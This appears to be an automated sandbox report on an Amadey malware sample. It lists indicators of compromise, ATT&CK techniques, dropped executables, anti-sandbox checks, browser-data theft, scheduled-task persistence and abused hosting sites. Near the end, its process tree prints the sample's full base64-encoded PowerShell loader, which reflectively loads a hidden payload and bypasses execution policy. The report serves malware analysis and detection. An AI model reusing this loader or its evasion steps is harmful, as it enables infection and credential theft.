amadey | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

System Information Discovery

Processes:

amert.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe

Executes dropped EXE 9 IoCs

Processes:

djdjdje1939_crypted_EASY.exebd2.exeamert.exewell.exetrust12344.exefund.exesyncUpd.exeTrumTrum.exe$77_loader.exe

pid	process
3248	djdjdje1939_crypted_EASY.exe
4500	bd2.exe
4488	amert.exe
4188	well.exe
4196	trust12344.exe
3500	fund.exe
3364	syncUpd.exe
5100	TrumTrum.exe
220	$77_loader.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

amert.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine amert.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine	amert.exe

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Z4KhyIsxcojW3lMlSqBTYJ4w.exe	themida

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe	upx
behavioral2/memory/5100-293-0x00000000010A0000-0x0000000001F03000-memory.dmp	upx
behavioral2/memory/5100-297-0x00000000010A0000-0x0000000001F03000-memory.dmp	upx

Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 152.89.198.214
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

description	ioc
Destination IP	152.89.198.214

Legitimate hosting services abused for malware hosting/C2 1 TTPs 50 IoCs

Web Service

T1102

Processes:

flow	ioc
535	raw.githubusercontent.com
231	raw.githubusercontent.com
386	raw.githubusercontent.com
522	raw.githubusercontent.com
523	raw.githubusercontent.com
617	raw.githubusercontent.com
229	raw.githubusercontent.com
387	raw.githubusercontent.com
250	pastebin.com
233	raw.githubusercontent.com
236	raw.githubusercontent.com
333	raw.githubusercontent.com
222	raw.githubusercontent.com
335	raw.githubusercontent.com
394	raw.githubusercontent.com
451	raw.githubusercontent.com
75	bitbucket.org
76	bitbucket.org
623	raw.githubusercontent.com
611	raw.githubusercontent.com
388	raw.githubusercontent.com
223	raw.githubusercontent.com
517	bitbucket.org
247	pastebin.com
457	raw.githubusercontent.com
456	raw.githubusercontent.com
458	raw.githubusercontent.com
173	raw.githubusercontent.com
311	raw.githubusercontent.com
530	raw.githubusercontent.com
1019	raw.githubusercontent.com
516	bitbucket.org
795	pastebin.com
452	raw.githubusercontent.com
532	raw.githubusercontent.com
797	pastebin.com
308	raw.githubusercontent.com
310	raw.githubusercontent.com
227	raw.githubusercontent.com
330	raw.githubusercontent.com
639	raw.githubusercontent.com
453	raw.githubusercontent.com
219	raw.githubusercontent.com
1040	bitbucket.org
1047	bitbucket.org
239	raw.githubusercontent.com
332	raw.githubusercontent.com
309	raw.githubusercontent.com
172	raw.githubusercontent.com
221	raw.githubusercontent.com

Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

225 whoer.net
228 whoer.net
363 api.myip.com
366 api.myip.com
367 ipinfo.io
368 ipinfo.io
Modifies powershell logging option 1 TTPs
evasion

Modify Registry
T1112

flow	ioc
225	whoer.net
228	whoer.net
363	api.myip.com
366	api.myip.com
367	ipinfo.io
368	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\well.exe	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

amert.exe

pid process

4488 amert.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1144 set thread context of 4992 1144 powershell.exe RegAsm.exe
Drops file in Windows directory 1 IoCs

Processes:

amert.exe

description ioc process

File created C:\Windows\Tasks\explorgu.job amert.exe
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

2068 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

6076 4992 WerFault.exe RegAsm.exe
5312 6524 WerFault.exe swiiiii.exe
6900 5496 WerFault.exe koooooo.exe

description	pid	process	target process
PID 1144 set thread context of 4992	1144	powershell.exe	RegAsm.exe

description	ioc	process
File created	C:\Windows\Tasks\explorgu.job	amert.exe

pid	process
2068	sc.exe

pid	pid_target	process	target process
6076	4992	WerFault.exe	RegAsm.exe
5312	6524	WerFault.exe	swiiiii.exe
6900	5496	WerFault.exe	koooooo.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

syncUpd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	syncUpd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	syncUpd.exe

Creates scheduled task(s) 1 TTPs 20 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4624	schtasks.exe
5032	schtasks.exe
8144	schtasks.exe
5504	schtasks.exe
7288	schtasks.exe
4272	schtasks.exe
876	schtasks.exe
2796	schtasks.exe
2376	schtasks.exe
1128	schtasks.exe
8952	schtasks.exe
2692	schtasks.exe
2824	schtasks.exe
6008	schtasks.exe
4980	schtasks.exe
6692	schtasks.exe
9052	schtasks.exe
2220	schtasks.exe
4536	schtasks.exe
4072	schtasks.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

6724 timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

3852 tasklist.exe

pid	process
6724	timeout.exe

pid	process
3852	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

NETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXE

pid process

5140 NETSTAT.EXE
5428 NETSTAT.EXE
5504 NETSTAT.EXE
1084 NETSTAT.EXE
9040 NETSTAT.EXE
9076 NETSTAT.EXE

pid	process
5140	NETSTAT.EXE
5428	NETSTAT.EXE
5504	NETSTAT.EXE
1084	NETSTAT.EXE
9040	NETSTAT.EXE
9076	NETSTAT.EXE

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133571322839354966"	chrome.exe

Modifies registry class 1 IoCs

Processes:

fund.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings fund.exe
Runs net.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

7576 PING.EXE
4980 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings	fund.exe

pid	process
7576	PING.EXE
4980	PING.EXE

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

amert.exepowershell.exechrome.exepowershell.exesyncUpd.exe$77_loader.exe

pid	process
4488	amert.exe
4488	amert.exe
5100	powershell.exe
5100	powershell.exe
5100	powershell.exe
5100	powershell.exe
4284	chrome.exe
4284	chrome.exe
1144	powershell.exe
1144	powershell.exe
1144	powershell.exe
1144	powershell.exe
1144	powershell.exe
1144	powershell.exe
3364	syncUpd.exe
3364	syncUpd.exe
220	$77_loader.exe
220	$77_loader.exe
220	$77_loader.exe
220	$77_loader.exe
220	$77_loader.exe
220	$77_loader.exe
220	$77_loader.exe
220	$77_loader.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

4284 chrome.exe
4284 chrome.exe
4284 chrome.exe

pid	process
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe

Suspicious use of AdjustPrivilegeToken 57 IoCs

Processes:

FUCKER.exepowershell.exetrust12344.exechrome.exepowershell.exe$77_loader.exe

description	pid	process
Token: SeDebugPrivilege	4424	FUCKER.exe
Token: SeDebugPrivilege	5100	powershell.exe
Token: SeDebugPrivilege	4196	trust12344.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeDebugPrivilege	220	$77_loader.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

well.exechrome.exe

pid	process
4188	well.exe
4188	well.exe
4188	well.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4188	well.exe
4284	chrome.exe
4188	well.exe
4188	well.exe
4188	well.exe
4284	chrome.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe

Suspicious use of SendNotifyMessage 62 IoCs

Processes:

well.exechrome.exe

pid	process
4188	well.exe
4188	well.exe
4188	well.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

FUCKER.exebd2.exewscript.exewell.execmd.exechrome.exe

description	pid	process	target process
PID 4424 wrote to memory of 3248	4424	FUCKER.exe	djdjdje1939_crypted_EASY.exe
PID 4424 wrote to memory of 3248	4424	FUCKER.exe	djdjdje1939_crypted_EASY.exe
PID 4424 wrote to memory of 3248	4424	FUCKER.exe	djdjdje1939_crypted_EASY.exe
PID 4424 wrote to memory of 4500	4424	FUCKER.exe	bd2.exe
PID 4424 wrote to memory of 4500	4424	FUCKER.exe	bd2.exe
PID 4424 wrote to memory of 4500	4424	FUCKER.exe	bd2.exe
PID 4424 wrote to memory of 4488	4424	FUCKER.exe	amert.exe
PID 4424 wrote to memory of 4488	4424	FUCKER.exe	amert.exe
PID 4424 wrote to memory of 4488	4424	FUCKER.exe	amert.exe
PID 4500 wrote to memory of 1648	4500	bd2.exe	wscript.exe
PID 4500 wrote to memory of 1648	4500	bd2.exe	wscript.exe
PID 4500 wrote to memory of 1648	4500	bd2.exe	wscript.exe
PID 4424 wrote to memory of 4188	4424	FUCKER.exe	well.exe
PID 4424 wrote to memory of 4188	4424	FUCKER.exe	well.exe
PID 4424 wrote to memory of 4188	4424	FUCKER.exe	well.exe
PID 1648 wrote to memory of 3496	1648	wscript.exe	cmd.exe
PID 1648 wrote to memory of 3496	1648	wscript.exe	cmd.exe
PID 1648 wrote to memory of 3496	1648	wscript.exe	cmd.exe
PID 4188 wrote to memory of 4284	4188	well.exe	chrome.exe
PID 4188 wrote to memory of 4284	4188	well.exe	chrome.exe
PID 3496 wrote to memory of 5100	3496	cmd.exe	powershell.exe
PID 3496 wrote to memory of 5100	3496	cmd.exe	powershell.exe
PID 3496 wrote to memory of 5100	3496	cmd.exe	powershell.exe
PID 4284 wrote to memory of 3976	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 3976	4284	chrome.exe	chrome.exe
PID 4424 wrote to memory of 4196	4424	FUCKER.exe	trust12344.exe
PID 4424 wrote to memory of 4196	4424	FUCKER.exe	trust12344.exe
PID 4424 wrote to memory of 4196	4424	FUCKER.exe	trust12344.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe
PID 4284 wrote to memory of 5116	4284	chrome.exe	chrome.exe

C:\Users\Admin\AppData\Local\Temp\FUCKER.exe
"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4424

C:\Users\Admin\AppData\Local\Temp\Files\djdjdje1939_crypted_EASY.exe
"C:\Users\Admin\AppData\Local\Temp\Files\djdjdje1939_crypted_EASY.exe"
2⤵
- Executes dropped EXE
PID:3248

C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4500

C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\Admin\start.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:1648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3496

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiLXRlbXAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KSW52b2tlLUV4cHJlc3Npb24gJGRlY29kZWRTdHJpbmcNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCI=')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5100

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:872

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:4992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 1680
7⤵
- Program crash
PID:6076

C:\Users\Admin\AppData\Local\Temp\Files\amert.exe
"C:\Users\Admin\AppData\Local\Temp\Files\amert.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:4488

C:\Users\Admin\AppData\Local\Temp\Files\well.exe
"C:\Users\Admin\AppData\Local\Temp\Files\well.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
3⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fff89bc9758,0x7fff89bc9768,0x7fff89bc9778
4⤵
PID:3976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1524 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:2
4⤵
PID:5116

